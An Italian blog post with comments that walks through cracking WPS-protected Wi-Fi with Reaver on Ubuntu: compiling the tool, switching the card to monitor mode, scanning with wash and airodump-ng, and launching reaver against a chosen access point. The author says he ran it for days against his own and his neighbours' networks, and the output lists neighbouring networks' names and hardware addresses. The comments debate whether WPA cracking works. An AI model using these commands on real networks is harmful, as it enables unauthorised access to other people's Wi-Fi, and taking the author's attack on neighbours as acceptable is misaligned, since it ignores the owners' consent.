http://www.bufferoverflow.it/2012/01/08/bucare-una-rete-wi-fi-protetta-con-ubuntu-usando-reaver/
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
Tempo fa' era uscito un'altro sistema (GERIX) ... leggete questo titolo ...
http://www.hackgeek.it/con-gerix-wifi-cracker-anche-mia-nonna-saprebbe-craccare-una-rete-wifi/
.... tanta fuffa, tanto copia incolla da un sito all'altro da un blog ad un'altro che hanno una cosa in comune oltre alla notizia. NESSUNO PRODUCE RISULTATI DI QUALI APPARATI RISULTINO VULNERABILI E IN QUALI CONDIZIONI.
-----------------------------------------------------------------------------
NOTA del 23/5/2013
Un'utente ci ha gentilmente segnalato su quali apparati la vulnerabilità WPS (quindi non strettamente WPA) è presente:
www.kb.cert.org/vuls/id/723755
Sapendo questo si può stabilire quali apparati provare ad attaccare a seconda del MAC address (che riconduce al brand). Incrociando le dita sul fatto che abbiano utilizzato il WPS anzichè impostare una passphrase a mano....
----------------------------------------------------------------------------
Bene signori, sappiate che sono tutte fandonie !!!!!
Ho lasciato giorni i PC di casa e dell'ufficio a crackare le mie reti e quelle dei vicini ... senza l'ombra di alcun risultato positivo.... ... Altro che anche mia nonna riuscirebbe a crackare una rete WPA .... solo buoffonate....
Se volete cimentarvi, vi pubblico qui una guida completa che ha funzionato sia su Ubuntu 10.04 che su 11.10.
scaricate reaver dal sito: http://code.google.com/ p/reaver-wps/downloads/detail? name=reaver-1.4.tar.gz&can=2& q=
ed estraetelo.
Reaver và compilato ... per farlo:
------------------------------ ---------
sudo apt-get install build-essential
sudo apt-get install libpcap0.8-dev
sudo apt-get install libsqlite3-dev
cd ~/Scaricati/reaver-1.4/src
./configure
make
sudo make install
-----------------------------
Per comodità installate anche la suite aircrack-ng
con il comando:
-------------------
sudo apt-get install aircrack-ng
-------------------
pare
che nelle prossime versioni di ubuntu il pacchetto non sarà più
presente... sarà un casino compilarlo a mano xke bisogna indietreggiare
la versione del compilatore c di sistema
questo il link del sorgente:
questo un cenno sulla versione del gcc:
Dopodiche' bisogna mettere l'interfaccia wireless in modo promiscuo. (quindi disabiliteremo la connettività)
------------------------------ ------------------------------ ---------
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
------------------------------ ------------------------------ -----
in alternativa si può usare (ma io non l'ho fatto .... tutti i comandi farebbero riferimento a mon0 anzichè wlan 0)
sudo airmon-ng start wlan0
Ora bisogna cercare le reti vulnerabili all'attacco reaver con la sua utility WASH
------------------------------ -------------------
sudo wash -i wlan0 --ignore-fcs
------------------------------ -------------------
Questo il risultato:
BSSID Channel RSSI WPS Version WPS Locked ESSID
------------------------------ ------------------------------ ------------------------------ ---------------------
C0:C1:C0:05:C6:A9 1 -89 1.0 No RossoSole
E0:91:F5:46:BF:22 6 -90 1.0 No Elio
02:BD:B9:E2:42:B2 1 -92 1.0 No dlink
D8:5D:4C:F5:16:27 4 -90 1.0 No TP-LINK_F51628
08:86:3B:57:23:10 6 -90 1.0 No belkin.310
Se volete vedere la differenza tra le reti e i client presenti in aria e gli AP vulnerabili bisogna usare AIRODUMP-NG
------------------------------ ----------------
sudo airodump-ng wlan0
CH 13 ][ Elapsed: 1 min ][ 2012-02-01 12:15
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0C:42:61:4C:D5 -32 463 239 8 9 54 . WPA CCMP PSK APCavalieri
00:0C:42:94:93:CD -75 353 80 2 9 54 . WPA CCMP PSK APCavalieri
00:14:C1:2E:66:19 -86 52 0 0 11 54e. WEP WEP USR9111
00:E0:4D:90:F4:6C -88 14 0 0 11 54 WPA2 CCMP PSK InfostradaWiFi-001399
E0:91:F5:46:BF:22 -88 53 2 0 6 54e. WPA2 CCMP PSK Elio
1C:BD:B9:40:2C:0A -88 52 0 0 6 54e WPA2 CCMP PSK D-Link
C0:C1:C0:05:C6:A9 -89 46 0 0 1 54e WPA2 CCMP PSK RossoSole
08:86:3B:57:23:10 -89 7 0 0 6 54e WPA2 CCMP PSK belkin.310
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:08:CA:21:FA:FA -51 0 - 1 0 7
(not associated) 04:46:65:56:9B:60 -87 0 - 1 0 56 Alice-31436523,Alice- 36598782,FAS
(not associated) 3C:4A:92:AC:D9:86 -88 0 - 1 96 116 Alice-45008691
00:0C:42:61:4C:D5 D8:B3:77:16:8F:7F -1 11 - 0 0 3
00:0C:42:61:4C:D5 74:A7:22:E0:7D:84 -23 54 -54 0 10
00:0C:42:61:4C:D5 04:1E:64:BE:67:8C -61 5 - 1 0 35 APCavalieri
00:0C:42:61:4C:D5 DC:2B:61:68:D8:0E -63 1 -54 0 86
------------------------------ -----------------
Con
questi dati, ho deciso di attaccare l'AP Rossosole ... quello col
segnale relativamente migliore.. devo specificare il MAC del AP
------------------------------ -------
sudo reaver -i wlan0 -b C0:C1:C0:05:C6:A9 -vv
------------------------------ --------
quindi sei riuscito o no?
RispondiEliminareaven non è un attacco bruteforce?
No. il mio obiettivo non era riuscirci, ho altro da fare. Il mio obbiettivo era vedere se "anche mia nonna" riuscirebbe a bucare il WPA.
RispondiEliminaCosi' non è, quindi il WPA è ad oggi da considerarsi un sistema di protezione delle reti wireless abbastanza sicuro per utenti casalinghi o piccoli uffici.
Il WPA Cracking funziona davvero ma di sicuro non ci riuscirebbe la nonna di nessuno di noi anzi è una procedura abbastanza complessa, almeno per chi non ha una discreta conoscenza informatica.
RispondiEliminaIl WPA Cracking funziona davvero ma di sicuro non ci riuscirebbe la nonna di nessuno di noi anzi è una procedura abbastanza complessa, almeno per chi non ha una discreta conoscenza informatica.
RispondiElimina